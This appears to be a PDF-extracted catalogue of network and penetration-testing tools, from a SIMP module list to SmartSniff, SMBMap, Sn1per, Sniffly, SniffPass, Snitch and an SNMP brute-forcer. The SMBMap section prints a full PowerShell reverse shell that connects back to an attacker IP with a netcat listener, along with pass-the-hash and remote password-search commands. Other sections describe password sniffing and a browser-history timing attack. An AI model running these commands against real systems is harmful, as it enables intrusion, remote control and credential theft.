pupmod-simp-autofs
pupmod-simp-backuppc
pupmod-simp-cgroups
pupmod-simp-clamav
pupmod-simp-common
pupmod-simp-concat
pupmod-simp-dhcp
pupmod-simp-elasticsearch
pupmod-simp-freeradius
pupmod-simp-functions
pupmod-simp-ganglia
pupmod-simp-gfs2
pupmod-simp-iptables
pupmod-simp-jenkins
pupmod-simp-kibana
pupmod-simp-krb5
pupmod-simp-libvirt
pupmod-simp-logrotate
pupmod-simp-logstash
pupmod-simp-mcafee
pupmod-simp-mcollective
pupmod-simp-mozilla
pupmod-simp-multipathd
pupmod-simp-named
pupmod-simp-network
pupmod-simp-nfs
pupmod-simp-nscd
pupmod-simp-ntpd
pupmod-simp-oddjob
pupmod-simp-openldap
pupmod-simp-openscap
pupmod-simp-pam
pupmod-simp-pki
pupmod-simp-polkit
pupmod-simp-postfix
pupmod-simp-pupmod
pupmod-simp-rsync
pupmod-simp-rsyslog
pupmod-simp-site
pupmod-simp-selinux
pupmod-simp-shinken
pupmod-simp-simp
pupmod-simp-snmpd
pupmod-simp-ssh
pupmod-simp-sssd
pupmod-simp-stunnel
pupmod-simp-sudo
pupmod-simp-sudosh
pupmod-simp-svckill
pupmod-simp-sysctl
pupmod-simp-tcpwrappers
pupmod-simp-tftpboot
pupmod-simp-tpm
pupmod-simp-upstart
pupmod-simp-vnc
pupmod-simp-vsftpd
pupmod-simp-windowmanager
pupmod-simp-xinetd
pupmod-simp-xwindows
rubygem-simp-rake-helpers
rubygem-simp-cli
Forked External Modules

Most forks are simply to fit the materials into our build
processes but some have modifications that we are looking to
push back upstream when possible.
augeasproviders
augeasproviders_apache
augeasproviders_base
augeasproviders_core
augeasproviders_grub
augeasproviders_mounttab
augeasproviders_nagios
augeasproviders_pam
augeasproviders_postgresql
augeasproviders_puppet
augeasproviders_shellvar
augeasproviders_ssh
puppet-elasticsearch
puppetlabs-apache
puppetlabs-postgresql
puppetlabs-stdlib
puppetlabs-inifile
puppetlabs-puppetdb
puppetlabs-mysql
puppetlabs-java
puppet-gpasswd
augeasproviders_sysctl
puppet-datacat
puppetlabs-java_ks
puppet-memcached
Download SIMP
SMARTSNIFF V2.16 - CAPTURE TCP/IP PACKETS ON
YOUR NETWORK ADAPTER
SmartSniff is a network monitoring utility that allows you to

capture TCP/IP packets that pass through your network
adapter, and view the captured data as sequence of
conversations between clients and servers. You can view the
TCP/IP conversations in Ascii mode (for text-based protocols,
like HTTP, SMTP, POP3 and FTP.) or as hex dump. (for nontext base protocols, like DNS)
SmartSniff provides 3 methods for capturing TCP/IP packets :
1. Raw Sockets (Only for Windows 2000/XP or greater):
Allows you to capture TCP/IP packets on your network
without installing a capture driver. This method has some

limitations and problems.
2. WinPcap Capture Driver: Allows you to capture TCP/IP
packets on all Windows operating systems. (Windows 98/
ME/NT/2000/XP/2003/Vista) In order to use it, you have to
download and install WinPcap Capture Driver from this
Web site. (WinPcap is a free open-source capture driver.)
This method is generally the preferred way to capture
TCP/IP packets with SmartSniff, and it works better than
the Raw Sockets method.
3. Microsoft Network Monitor Driver (Only for Windows 2000/
XP/2003): Microsoft provides a free capture driver under
Windows 2000/XP/2003 that can be used by SmartSniff,
but this driver is not installed by default, and you have to
manually install it, by using one of the following options:
Option 1: Install it from the CD-ROM of Windows
2000/XP according to the instructions in Microsoft
Web site
Windows XP Service Pack 2 Support Tools. One of
the tools in this package is netcap.exe. When you run
this tool in the first time, the Network Monitor Driver
will automatically be installed on your system.
4. Microsoft Network Monitor Driver 3: Microsoft provides a
new version of Microsoft Network Monitor driver (3.x) that
is also supported under Windows 7/Vista/2008. Starting
from version 1.60, SmartSniff can use this driver to
capture the network traffic.
SYSTEM REQUIREMENTS
SmartSniff can capture TCP/IP packets on any version of
Windows operating system (Windows 98/ME/NT/2000/XP/

2003/2008/Vista/7/8) as long as WinPcap capture driver is
installed and works properly with your network adapter.
You can also use SmartSniff with the capture driver of Microsoft
Network Monitor, if it's installed on your system.
Under Windows 2000/XP (or greater), SmartSniff also allows
you to capture TCP/IP packets without installing any capture
driver, by using 'Raw Sockets' method. However, this capture
method has some limitations and problems:
Outgoing UDP and ICMP packets are not captured.
On Windows XP SP1 outgoing packets are not captured
at all - Thanks to Microsoft's bug that appeared in SP1
update...
This bug was fixed on SP2 update, but under Vista,
Microsoft returned back the outgoing packets bug of XP/
SP1.
On Windows Vista/7/8: Be aware that Raw Sockets

method doesn't work properly on all systems. It's not a
bug in SmartSniff, but in the API of Windows operating
system. If you only see the outgoing traffic, try to turn off
Windows firewall, or add smsniff.exe to the allowed
programs list of Windows firewall.
DownloadSmartSniff v2.16
SMARTSNIFF V2.17 - CAPTURE TCP/IP PACKETS ON
YOUR NETWORK ADAPTER
SmartSniff is a network monitoring utility that allows you to

capture TCP/IP packets that pass through your network
adapter, and view the captured data as sequence of
conversations between clients and servers. You can view the
TCP/IP conversations in Ascii mode (for text-based protocols,
like HTTP, SMTP, POP3 and FTP.) or as hex dump. (for nontext base protocols, like DNS)
SmartSniff provides 3 methods for capturing TCP/IP packets :
1. Raw Sockets (Only for Windows 2000/XP or greater):
Allows you to capture TCP/IP packets on your network
without installing a capture driver. This method has some
limitations and problems.

2. WinPcap Capture Driver: Allows you to capture TCP/IP
packets on all Windows operating systems. (Windows 98/
ME/NT/2000/XP/2003/Vista) In order to use it, you have to
download and install WinPcap Capture Driver from this
Web site. (WinPcap is a free open-source capture driver.)
This method is generally the preferred way to capture
TCP/IP packets with SmartSniff, and it works better than
the Raw Sockets method.
3. Microsoft Network Monitor Driver (Only for Windows 2000/
XP/2003): Microsoft provides a free capture driver under
Windows 2000/XP/2003 that can be used by SmartSniff,
but this driver is not installed by default, and you have to
manually install it, by using one of the following options:
Option 1: Install it from the CD-ROM of Windows
2000/XP according to the instructions in Microsoft
Web site
Windows XP Service Pack 2 Support Tools. One of
the tools in this package is netcap.exe. When you run
this tool in the first time, the Network Monitor Driver
will automatically be installed on your system.
4. Microsoft Network Monitor Driver 3: Microsoft provides a
new version of Microsoft Network Monitor driver (3.x) that
is also supported under Windows 7/Vista/2008. Starting
from version 1.60, SmartSniff can use this driver to
capture the network traffic.
Notice: If WinPcap is installed on your system, and you
want to use the Microsoft Network Monitor Driver method,
it's recommended to run SmartSniff with /NoCapDriver,
because the Microsoft Network Monitor Driver may not
work properly when WinPcap is loaded too.
Using SmartSniff
In order to start using SmartSniff, simply copy the executable

(smsniff.exe) to any folder you like, and run it (installation is not
needed).
After running SmartSniff, select "Start Capture" from the File
menu, or simply click the green play button in the toolbar. If it's
the first time that you use SmartSniff, you'll be asked to select
the capture method and the network adapter that you want to
use. If WinPcap is installed on your computer, it's
recommended to use this method to capture packets.
After selecting the capture method and your network adapter,
click the 'OK' button to start capturing TCP/IP packets. while
capturing packets, try to browse some Web sites, or retrieve
new emails from your email software. After stopping the
capture (by clicking the red stop button) SmartSniff displays the
list of all TCP/IP conversations the it captured. When you select
a specific conversation in the upper pane, the lower pane
displays the TCP/IP streams of the selected client-server
conversation.
If you want the save the captured packets for viewing them
later, use "Save Packets Data To File" option from the File
menu.
Display Mode
SmartSniff provides 3 basic modes to display the captured

data: Automatic, Ascii, and Hex Dump. On Automatic mode
(the default), SmartSniff checks the first bytes of the data
stream - If it contains characters lower than 0x20 (excluding
CR, LF and tab characters), it displays the data in Hex mode.
otherwise, it displays it in Ascii mode.
You can easily switch between display modes by selecting
them from the menu, or by using F2 - F4 keys. Be aware that
'Hex Dump' mode is much slower than Ascii mode.
Starting from version 1.35, there is a new mode - 'URL List'.

This mode only display the URL addresses list (http://...) found
in the captured packets.
Exporting the captured data
SmartSniff allows you to easily export the captured data for

using it in other applications:
The upper pane: you can select one or more items in the
upper pane, and then copy them to the clipboard (You can
paste the copied items into Excel or into spreadsheet of
OpenOffice.org) or save them to text/HTML/XML file (by
using 'Save Packet Summaries').
The lower pane: You can select any part of the TCP/IP
streams (or select all text, by using Ctrl+A), copy the
selected text to the clipboard, and then paste it to
Notepad, Wordpad, MS-Word or any other editor. When
you paste the selected streams to document of Wordpad,
OpenOffice.org, or MS-Word, the colors are also
transferred.
Your can also export the TCP/IP streams to text file,
HTML file, or raw data file, by using "Export TCP/IP
Streams" option.
Capture and Display Filters
Starting from version 1.10, you can filter unwanted TCP/IP

activity during the capture process (Capture Filter), or when
displaying the captured TCP/IP data (Display Filter).
For both filter types, you can add one or more filter strings
(separated by spaces or CRLF) in the following syntax:
[include | exclude] : [local | remote | both] : [tcp | udp | tcpudp |
icmp | all] : [IP Range | Ports Range]
Here's some examples that demonstrate how to create a filter
string:
Display only packets with remote tcp port 80 (Web sites):

include:remote:tcp:80
Display only packets with remote tcp port 80 (Web sites)

and udp port 53 (DNS):
include:remote:tcp:80
include:remote:udp:53
Display only packets originated from the following IP

address range: 192.168.0.1 192.168.0.100:
include:remote:all:192.168.0.1-192.168.0.100
Display only TCP and UDP packets that use the following
port range: 53 - 139:
include:both:tcpudp:53-139
Filter most BitTorrent packets (port 6881):

exclude:both:tcpupd:6881
Filter all ICMP packets (Ping/Traceroute activity):

exclude:both:icmp
Notice: A single filter string must not include spaces !

Live Mode
Starting from version 1.10, a new option was added to

'Advanced Options' section - 'Live Mode'. When SmartSniff
capture packets in live mode, the TCP/IP conversations list is
updated while capturing the packets, instead of updating it only
after the capture is finished. Be aware that "Live Mode"
requires more CPU resources than non-live mode. So if your
computer is slow, or your have a very high traffic on your
network, it's recommended to turn off this option.
Starting from version 1.20, you can also view the content of
each TCP/IP conversation (in the lower pane) while capturing
the packets. However, if the TCP/IP conversation is too large,

you won't be able to watch the entire TCP/IP conversation until
the capture is stopped.
Viewing process information
Starting from version 1.30, you can view the process

information (ProcessID and process filename) for captured TCP
packets. However, this feature have some limitations and
problems:
Process information is only displayed for TCP packets (It
doesn't work with UDP)
Process information may not be displayed for TCP
connections that closed after short period of time.
Retrieving process information consume more CPU
resources and may slow down your computer. It's not
recommended to use this feature if you have intensive
network traffic.
Process information is currently not saved in ssp file.
In order to activate this feature, go to 'Advanced Options'
dialog-box, check the "Retrieve process information while
capturing packets" option and click the 'OK' button. 2 new
columns will be added: ProcessID and Process Filename. Start
capturing, and process information will be displayed for the
captured TCP conversations.
The structure of .ssp file (SmartSniff Packets File)
The structure of .ssp file saved by SmartSniff is very a simple. It

contains one main header in the beginning of the file, followed
by sequence of all TCP/IP packets, each of them begins with a
small header.
The main header structure:
00 - SMSNF200 signature.
08 - (2 bytes) The number of bytes in the header (currently 4
bytes for the IP Address)
0A - (4 bytes) IP Address
Header of each packet:
00 (2 Bytes) packet header size (currently 0x18 bytes)
02 (4 Bytes) number of received bytes in packet.
06 (8 Bytes) Packet time in Windows FILETIME format.
0E (6 Bytes) Source Mac Address.
14 (6 Bytes) Dest. Mac Address.
1A The remaining bytes are the TCP/IP packet itself.
DownloadSmartSniff v2.17
SMARTTY - MULTI-TABBED SSH CLIENT WITH SCP
SUPPORT
SmarTTY is a free multi-tabbed SSH client that supports

copying files and directories with SCP on-the-fly and editing
files in-place.
One SSH session - multiple tabs
Most SSH servers support up to 10 sub-sessions per

connection. SmarTTY makes the best of it: no annoying
multiple windows, no need to relogin, just open a new tab and
go!
Transfer files and whole directories
Explore remote directory structure with Windows-style GUI

Download and upload single files with SCP protocol
Transfer entire directories with recursive SCP
Quickly send and receive directories with on-the-fly TAR
Edit files in-place
Select "File->Open" to open an editor tab for a remote file:

Native Windows file editing look & feel
Automatic CRLF to LF conversion
Option to invoke 'sudo' to save protected files
Built-in hex terminal for COM ports
Simply select "Setup new serial or TCP connection" to

conveniently communicate with your embedded device:
View data in ASCII, HEX or both
Save communication logs to files
Automatically group data packets based on time of arrival
Out-of-the-box public-key auth
SmarTTY can automatically configure public key authentication

for selected remote computers:
No need to enter your password each time
Private key is securely stored in Windows key container
One-click configuration of remote host
Your Unix password is not stored anywhere
Run graphical applications seamlessly
SmarTTY comes with a pre-built XMing X11 server. The server

will be configured and started on-the-fly as soon as you launch
a graphical application in terminal:
Remote X11 apps run out-of-the-box
No need to configure anything manually
DownloadSmarTTY
SMBMAP - SAMBA SHARE ENUMERATOR
SMBMap allows users to enumerate samba share drives

across an entire domain. List share drives, drive permissions,
share contents, upload/download functionality, file name autodownload pattern matching, and even execute remote
commands. This tool was designed with pen testing in mind,
and is intended to simplify searching for potentially sensitive
data across large networks.
Some of the features have not been thoroughly tested, so
changes will be forth coming as bugs are found. I only really
find and fix the bugs while I'm on engagements, so progress is
a bit slow. Any feedback or bug reports would be appreciated.
It's definitely rough around the edges, but I'm just trying to pack
in features at the moment. Version 2.0 should clean up the
code a lot.whenever that actually happens ;). Thanks for
checking it out!! Planned features include simple remote shell
(instead of the god awful powershell script in the examples),
actual logging, shadow copying ntds.dit automation (Win7 and
up only..for now), threading, other things.
Features:
Pass-the-Hash Support
File upload/download/delete
Permission enumeration (writable share, meet Metasploit)
Remote Command Execution
Distrubted file content searching (new!)

File name matching (with an auto downoad capability)
Help
SMBMap - Samba Share Enumerator | Shawn Evans ShawnDEvans@gmail.com
optional arguments:
-h, --Help
Main arguments:
-H HOST
IP of host
--host-file FILE
File containing a list of hosts
-u USERNAME
Username, if omitted null session
assumed
-p PASSWORD
Password or NTLM hash
-s SHARE
Specify a share (default C$), ex
'C$'
-d DOMAIN
Domain name (default WORKGROUP)
-P PORT
SMB port (default 445)
Command Execution:
Options for executing commands on the specified host
-x COMMAND
Execute a command ex. 'ipconfig /
r'
Filesystem Search:
Options for searching/enumerating the filesystem of the
specified host
-L
List all drives on the specified
host
-R [PATH]
Recursively list dirs, and files
(no share\path lists

ALL shares), ex. 'C$\Finance'
-r [PATH]
List contents of directory,
default is to list root of

all shares, ex. -r 'C$\Documents
and
Settings\Administrator\Documents'
-A PATTERN
Define a file name pattern
(regex) that auto downloads

a file on a match (requires -R or
-r), not case
sensitive, ex '(web|global).
(asax|config)'
-q
Disable verbose output (basically
only really useful

with -A)
File Content Search:
Options for searching the content of files
-F PATTERN
File content search, -F
'[Pp]assword' (requies admin

access to execute commands, and
powershell on victim
host)
--search-path PATH
(used with -F, default
Specify drive/path to search
C:\Users), ex 'D:\HR\'
Filesystem interaction:
Options for interacting with the specified host's
filesystem
--download PATH
Download a file from the remote
system,
ex.'C$\temp\passwords.txt'
--upload SRC DST
Upload a file to the remote
system ex.
'/tmp/payload.exe C$\temp
\payload.exe'
--delete PATH TO FILE
Delete a remote file, ex. 'C$
\temp\msf.exe'
--skip
Skip delete file confirmation
prompt
Examples:
$ python smbmap.py -u jsmith -p password1 -d workgroup -H
192.168.0.1
$ python smbmap.py -u jsmith -p
'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111ae
f4a50a94d' -H 172.16.0.20
$ python smbmap.py -u 'apadmin' -p 'asdf1234!' -d ACME -H
10.1.3.30 -x 'net group "Domain Admins" /domain'
Default Output:
$
python smbmap.py --host-file smb-hosts.txt -u jsmith -
p 'R33nisP!nckl3' -d ABC
[+] Reading from stdin

[+] Finding open SMB ports....
[+] User SMB session establishd...
[+] IP: 192.168.0.5:445 Name: unkown
Disk
Permissions
-------------ADMIN$
READ, WRITE
C$
READ, WRITE
IPC$
NO ACCESS
TMPSHARE
READ, WRITE
[+] IP: 192.168.2.50:445
Disk
Permissions
-------------IPC$
NO ACCESS
print$
READ, WRITE
My Dirs
NO ACCESS
WWWROOT_OLD
NO ACCESS
Name: unkown
ADMIN$
READ, WRITE
C$
READ, WRITE
Command execution:
$ python smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x
'net group "Domain Admins" /domain' -H 192.168.2.50
[+] IP: 192.168.2.50:445
Name: unkown
Group name
Domain Admins
Comment
Designated administrators of the domain
Members
-----------------------------------------------------------------------------abcadmin
The command completed successfully.
Non recursive path listing (ls):

$ python smbmap.py -H 172.16.0.24 -u Administrator -p
'changeMe' -r 'C$\Users'
[+] IP: 172.16.0.24:445 Name: 172.16.0.24
Disk
Permissions
-------------C$
READ, WRITE
.Users
dw--w--w-2015
0 Wed Apr 29 13:15:25
.
dw--w--w--
2015
0 Wed Apr 29 13:15:25
..
dr--r--r--
0 Wed Apr 22 14:50:36 2015
Administrator
dr--r--r--
0 Thu Apr
9 14:46:57 2015
0 Thu Apr
9 14:46:49 2015
0 Thu Apr
9 14:46:57 2015
174 Thu Apr
9 14:44:01 2015
0 Thu Apr
9 14:46:49 2015
All Users
dw--w--w-Default
dr--r--r-Default User
fr--r--r-desktop.ini
dw--w--w-Public
dr--r--r--
0 Wed Apr 22 13:33:01 2015
wingus
File Content Searching:

p00p1234! -F password --search-path 'C:\Users\wingus
\AppData\Roaming'
[!] Missing domain...defaulting to WORKGROUP
[+] IP: 192.168.1.203:445 Name: unkown
[+] File search started on 1 hosts...this could take a
while
[+] Job 861d4cd845124cad95d42175 started on
192.168.1.203, result will be stored at C:\Windows\TEMP
\861d4cd845124cad95d42175.txt
[+] Grabbing search results, be patient, share drives
tend to be big...
[+] Job 1 of 1 completed
[+] All jobs complete
Host: 192.168.1.203
Pattern: password
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles
\35msadwm.default\logins.json
C:\Users\wingus\AppData\Roaming\Mozilla\Firefox\Profiles
\35msadwm.default\prefs.js
Drive Listing:
This feature was added to compliment the file content

searching feature
'R33nisP!nckle' -L
[!] Missing domain...defaulting to WORKGROUP
[+] IP: 192.168.1.24:445 Name: unkown
[+] Host 192.168.1.24 Local Drives: C:\ D:\
[+] Host 192.168.1.24 Net Drive(s):
E:
\\vboxsrv\Public
VirtualBox Shared
Folders
Nifty Shell:
Run Powershell Script on Victim SMB host (change the IP in

the code to your IP addres, i.e where the shell connects back
to)
$ python smbmap.py -u jsmith -p 'R33nisP!nckle' -d ABC -H
192.168.2.50 -x 'powershell -command "function
ReverseShellClean {if ($c.Connected -eq $true)
{$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()};
exit; };$a=""""192.168.0.153""""; $port=""""4445"""";
$c=New-Object system.net.sockets.tcpclient;$c.connect($a,
$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[]
$c.ReceiveBufferSize
;$p=New-Object
System.Diagnostics.Process
$p.StartInfo.FileName=""""cmd.exe""""
$p.StartInfo.RedirectStandardInput=1
;
;
$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShe
llExecute=0
;$p.Start()
$p.StandardOutput
;$is=$p.StandardInput
;Start-Sleep 1
System.Text.AsciiEncoding
;$os=
;$e=new-object
;while($os.Peek() -ne -1){$out
+= $e.GetString($os.Read())} $s.Write($e.GetBytes($out),
0,$out.Length)
;$out=$null;$done=$false;while (-not
$done) {if ($c.Connected -ne $true) {cleanup}

$pos=0;$i=1; while (($i -gt 0) -and ($pos -lt
$nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos);
$pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains
10)) {break}}
if ($pos -gt 0){ $string=$e.GetString($nb,
0,$pos); $is.write($string); start-sleep 1; if

($p.ExitCode -ne $null) {ReverseShellClean} else {
$out=
$e.GetString($os.Read());while($os.Peek() -ne -1){ $out

+= $e.GetString($os.Read());if ($out -eq $string)
{$out="""" """"}}
$s.Write($e.GetBytes($out),
0,$out.length); $out=$null; $string=$null}} else

{ReverseShellClean}};"'
[+] IP: 192.168.2.50:445
Name: unkown
[!] Error encountered, sharing violation, unable to

retrieve output
Attackers Netcat Listener:

$ nc -l 4445
Microsoft Windows [Version 6.1.7601]

Copyright (c) 2009 Microsoft Corporation.
All rights
reserved.
C:\Windows\system32>whoami
nt authority\system
Download SMBMap
SN1PER - AUTOMATED PENTEST RECON SCANNER
Sn1per is an automated scanner that can be used during a
penetration test to enumerate and scan for vulnerabilities.
Features
Automatically collects basic recon (ie. whois, ping, DNS,

etc.)
Automatically launches Google hacking queries against a
target domain
Automatically enumerates open ports
Automatically brute forces sub-domains and DNS info
Automatically runs targeted nmap scripts against open
ports
Automatically scans all web applications for common
vulnerabilities
Automatically brute forces all open services
Install
chmod +x install.sh
./install.sh
Installs all dependencies. Best run from Kali Linux.

Usage
./sn1per
SAMPLE REPORT:
https://gist.githubusercontent.com/1N3/070d14c364e5f23bfe5e/
raw/8e152e740ba50cd49bb3366ec91cf7d08ca02715/Sn1per
%2520Sample%2520Report
Download Sn1per
SNIFFLY - SNIFFING BROWSER HISTORY USING HSTS +
CSP.
Sniffly is an attack that abuses HTTP Strict Transport Security

and Content Security Policy to allow arbitrary websites to sniff a
user's browsing history. It has been tested in Firefox and
Chrome.
More info available in my ToorCon 2015 slides: https://
zyan.scripts.mit.edu/presentations/toorcon2015.pdf .
Demo
Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera

with HTTPS Everywhere disabled. If you use an ad blocker, a
bunch of advertising domains will probably show up in the
"Probably Visited" column (ignore them).
How it works
I recommend reading the inline comments in src/index.js to

understand how Sniffly does a timing attack in both FF and
Chrome without polluting the local HSTS store. tl;dr version:
1. User visits Sniffly page
2. Browser attempts to load images from various HSTS
domains over HTTP
3. Sniffly sets a CSP policy that restricts images to HTTP, so
image sources are blocked before they are redirected to
HTTPS. This is crucial! If the browser completes a request
to the HTTPS site, then it will receive the HSTS pin, and
the attack will no longer work when the user visits Sniffly.
4. When an image gets blocked by CSP, its onerror handler
is called. In this case, the onerror handler does some
fancy tricks to time how long it took for the image to be
redirected from HTTP to HTTPS. If this time is on the
order of a millisecond, it was an HSTS redirect (no
network request was made), which means the user has
visited the image's domain before. If it's on the order of
100 milliseconds, then a network request probably
occurred, meaning that the user hasn't visited the image's
domain.
Finding HSTS hosts
To scrape an included list of sites ( util/strict-transportsecurity.txt , courtesy Scott Helme) to determine which
hosts send HSTS headers, do:
$ cd util
$ ./run.sh <number_of_batches> > results.log
where 1 batch is 100 sites. You can override util/stricttransport-security.txt with a different list, such as the full
Alexa Top 1M, if you want.
To process and sort the results by max-age, excluding ones
with max-age less than 1 day and ones that are preloaded:
$ cd util
$ ./process.py <results_file> > processed.log
Once that's done, you can copy the hosts from processed.log
into src/index.js .
Running sploitz
Visiting file:///path/to/sniffly/src/index.html in
Chrome should just work. In Firefox, CSP headers using the
tag are apparently not supported yet, so you need to set up a
local webserver to serve the CSP HTTP response header. My
Nginx server block looks something like this:
server {
listen 8081;
server_name localhost;
location / {
root /path/to/sniffly/src;
add_header Content-Security-Policy "img-src
http:";
index index.html;
}
}
Or in .htaccess :
<IfModule mod_headers.c>
Header set Content-Security-Policy "img-src http:"
</IfModule>
Or send the header via php .

Paste this at the start of the script (and change the name to
index.php):
<?php
$csp_rules = "img-src http:";
// Just to ensure maximum compatibility
header('X-WebKit-CSP: '.$csp_rules);
header('X-Content-Security-Policy: '.$csp_rules);
header('Content-Security-Policy: '.$csp_rules);
?>
Caveats
Not supported yet in Safari, IE, or Chrome on iOS.

Extensions such as HTTPS Everywhere will mess up
results.
Doesn't work reliably in Tor Browser since timings are
rounded to the nearest 100-millisecond.
Users with a different HSTS preload list (ex: due to having
an older browser) may not see accurate results.
Acknowledgements
Scott Helme for an initial list of HSTS hosts that he had

found so I didn't have to scan the entire Alexa 1M.
Chris Palmer for advising on how to file a privacy bug in
Chrome.
Dan Kaminsky and WhiteOps for sponsoring the ToorCon
trip where this was presented.
Jan Schaumann and Chris Rohlf for being early testers.
Everyone who let me sleep on their couch while I did this
over my "vacation break". You know who you are!
Download Sniffly
SNIFFPASS - PASSWORD MONITORING/SNIFFING
SOFTWARE (WEB/FTP/EMAIL)
SniffPass is small password monitoring software that listens to

your network, capture the passwords that pass through your
network adapter, and display them on the screen instantly.
SniffPass can capture the passwords of the following Protocols:
POP3, IMAP4, SMTP, FTP, and HTTP (basic authentication
passwords).
You can use this utility to recover lost Web/FTP/Email
passwords.
USING SNIFFPASS
In order to start using SniffPass, follow the instructions below:

1. Download and install the WinPcap capture driver or the
Microsoft Network Monitor driver.
You can also try to capture without any driver installation,
simply by using the 'Raw Socket' capture method, but you
should be aware that this method doesn't work properly in
many systems.
2. Run the executable file of SniffPass (SniffPass.exe).
3. From the File menu, select "Start Capture", or simply click
the green play button in the toolbar. If it's the first time that
you use SniffPass, you'll be asked to select the capture
method and the network adapter that you want to use.
After you select the desired capture options, SniffPass

listen to your network adapter, and display instantly any
password that it find.
4. In order to verify that the password sniffing works in your
system, go to the demo Web page at http://
www.nirsoft.net/password_test and type 'demo' as user
name and 'password' as the password. After typing the
user name/password and clicking 'Ok', you should see a
new line in the main window of SniffPass containing the
user/password you typed.
GET PASSWORDS OF ANOTHER COMPUTER ON YOUR
NETWORK ?
Many people ask me whether SniffPass is able to get

passwords from another computer on the same network. So
here's the answer. In order to grab the passwords from other
network computers:
1. You must use a simple hub to connect your computers to
the network. All modern switches and routers
automatically filter the packets of the other computers, so
the computer that runs SniffPass will never "see" the
passwords of other computers when you use a switch or a
router.
2. Your network card must be able to enter into 'Promiscuous
Mode'.
3. You must use WinPCap or Network Monitor Driver as a
capture method.
4. For wireless network: Most wireless network cards (or
their device drivers) automatically filter the packets of
other computers, so you won't be able the capture the
passwords of ther computers. However, starting from
Windows Vista/7, you can capture passwords of wireless
networks that are not encrypted, by using Wifi Monitor
Mode and Network Monitor Driver 3.x.
For more information about capturing from wireless
networks , read this Blog post: How to capture data and

passwords of unsecured wireless networks with SniffPass
and SmartSniff
COMMAND-LINE OPTIONS
Comman
d
Description
/
NoCapD
river
Starts SniffPass without loading the WinPcap

Capture Driver.
/NoReg
Starts SniffPass without loading/saving your

settings to the Registry.
DownloadSniffPass
SNITCH - INFORMATION GATHERING VIA DORKS
Snitch is a tool which automate dorking process for specified

domain. Using build-in dork categories, this tool helps gather
informations about domain which can be found using search
engines. It can be quite useful in early phases of pentest.
Examples
devil@hell:~/snitch/$ python snitch.py
_ __
_________
__
(_) /______/ /_
/ ___/ __ \/ / __/ ___/ __ \

(__
) / / / / /_/ /__/ / / /
/____/_/ /_/_/\__/\___/_/ /_/ ~0.2
Usage: snitch.py [options]

Options:
-h, --help
-U [url], --url=[url]
domain(s) or domain extension(s)
separated by comma *
-D [type], --dork=[type]
dork type(s) separated by comma *
-O [file], --output=[file]
output file
-S [ip:port], --socks=[ip:port]
socks5 proxy
-I [seconds], --interval=[seconds]
interval between requests, 2s by
default
-P [pages], --pages=[pages]
pages to retrieve, 10 by default
-v
turn on verbosity
Dork types:
info
| Information leak & Potential web bugs
ext
| Sensitive extensions
docs
| Documents & Messages
files | Files & Directories

soft
| Web software
all
| All
Examples:
snitch.py -I5 -P3 --dork=ext,info -U gov -S
127.0.0.1:9050
snitch.py --url=site.com -D all -O /tmp/dorks
devil@hell:~/snitch/$ python snitch.py -U gov -D ext -P20

-S 127.0.0.1:9050
[+] Target: gov
[!] Using SOCKS5 (IP - XX.XX.XX.XX)
[!] Pages limit set to 20
[+] Looking for sensitive extensions
http://www.seismic.ca.gov/pub/CSSC_1998-01_COG.pdf.OLD
http://greengenes.lbl.gov/Download/Sequence_Data/
Fasta_data_files/CoreSet_2010/formatdb.log
http://www.uspto.gov/web/patents/pdx/
permitting_access.pdf_2010may17.bak
http://www.dss.virginia.gov/tst.log
http://appliedresearch.cancer.gov/nhanes_pam/
create.pam_perday.log
ftp://ftp.eia.doe.gov/pub/oil_gas/natural_gas/
feature_articles/2006/ngshock/ngshock.pdf.bak
http://appliedresearch.cancer.gov/nhanes_pam/
create.pam_perminute.log
https://igscb.jpl.nasa.gov/igscb/station/mgexlog/
nya2_20130905.log
http://www.swrcb.ca.gov/losangeles/board_decisions/
adopted_orders/index.shtml.old
https://trac.mcs.anl.gov/projects/mpich2/attachment/
ticket/83/config.log
https://tcga-data.nci.nih.gov/docs/index.html.bak
https://software.sandia.gov/trac/canary/attachment/
ticket/3917/Pike_Hach%26SCAN_Oracle.edsx_convert.log
http://www.glerl.noaa.gov/metdata/2check_all.log
http://ft.ornl.gov/eavl/regression/configure.log
http://airsar.jpl.nasa.gov/airdata/PRECISION_LOG/
hd1883.log
http://www.antd.nist.gov/pubs/
Sriram_BGP_IEEE_JSAC.pdf.old
http://www-esh.fnal.gov/pls/default/itna.log
http://www.lanl.gov/wrtout/projects/tscattering/nano/
Output//Defaults/ellipsoid.log
http://maine.gov/REVENUE/netfile/WS_FTP.LOG
http://mls.jpl.nasa.gov/lay/UARS_MLS.LOG
http://airsar.jpl.nasa.gov/airdata/PRECISION_LOG/
hd1469.log
http://www.modot.mo.gov/_baks/indexalt.htm.0001.b041.bak
ftp://ftp.hrsa.gov/ruralhealth/FY04RAEDGuidance.pdf.bak
https://www.health.ny.gov/health_care/medicaid/
nyserrcd.ini
http://www.thruway.ny.gov/business/contractors/expedite/
bid.ini
http://www.star.bnl.gov/~pjakl/documents/
configuration.cfg
http://www.wpc.ncep.noaa.gov/html/ecmwf0012loop500_ak.cfg
https://fermilinux.fnal.gov/documentation/security/
krb5.conf
http://mirror.pnl.gov/macports/release/ports/security/
fail2ban/files/pf-icefloor.conf
https://svn.mcs.anl.gov/repos/ZeptoOS/trunk/BGP/ramdisk/
CN/tree/etc/syslog.conf
http://cmip-pcmdi.llnl.gov/cmip5/docs/esg.ini
https://security.fnal.gov/krb5.conf
http://collaborate2.nws.noaa.gov/canned_data/data_files/
pqact.conf
[+] Done!
DownloadSnitch
SNMP BRUTE - FAST SNMP BRUTE FORCE,
ENUMERATION, CISCO CONFIG DOWNLOADER AND
PASSWORD CRACKING SCRIPT
SNMP brute force, enumeration, CISCO config downloader and
password cracking script. Listens for any responses to the
brute force community strings, effectively minimising wait time.
Requirements
metasploit
snmpwalk
snmpstat
john the ripper
Usage
python snmp-brute.py -t [IP]
Options
--help, -h show this help message and exit

--file=DICTIONARY, -f DICTIONARY Dictionary file
--target=IP, -t IP Host IP
--port=PORT, -p PORT SNMP port
Advanced
--rate=RATE, -r RATE Send rate

